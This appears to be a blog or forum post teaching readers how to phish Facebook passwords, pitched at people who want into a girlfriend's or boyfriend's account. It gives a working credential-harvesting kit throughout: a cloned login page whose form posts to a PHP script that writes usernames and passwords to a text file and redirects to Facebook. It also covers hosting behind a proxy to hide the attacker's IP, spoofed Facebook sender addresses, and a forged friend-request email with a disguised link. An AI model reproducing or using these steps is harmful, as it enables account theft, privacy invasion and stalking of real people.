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Hi folks...
In these days facebook become the number 1 social networking site, Everyone who are using facebook accounts want to hack the facebook account of others. Most of the peoples want to control over their girlfriend facebook accounts. Is't it..? A lot of people contact me about suspecting their boyfriend/girlfriend of cheating, they give me their id's and want to know their passwords. So let me start...

Phishing WebPage:
Phishing is a way to acquire information such as usernames, passwords and credit card details of a user. Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.

Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:

You have to change it to 'action="gain.php" '. after you have done that, you should change the method (small circle on the picture) to "get" instead of "post", otherwise it will not work. Save the document as index.html

Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("show.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

save this file as "gain.php"

Step 4:
open the notepad and just save the file as "show.txt" without any contents.

Now upload these 3 files(namely index.html,gain.php,show.txt) on any Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.

Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  

Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 

For user to believe change Your phishing web page url with any of free short url sites. 

Like : co.nr, co.cc etc..
This will make users to believe that it is correct url.


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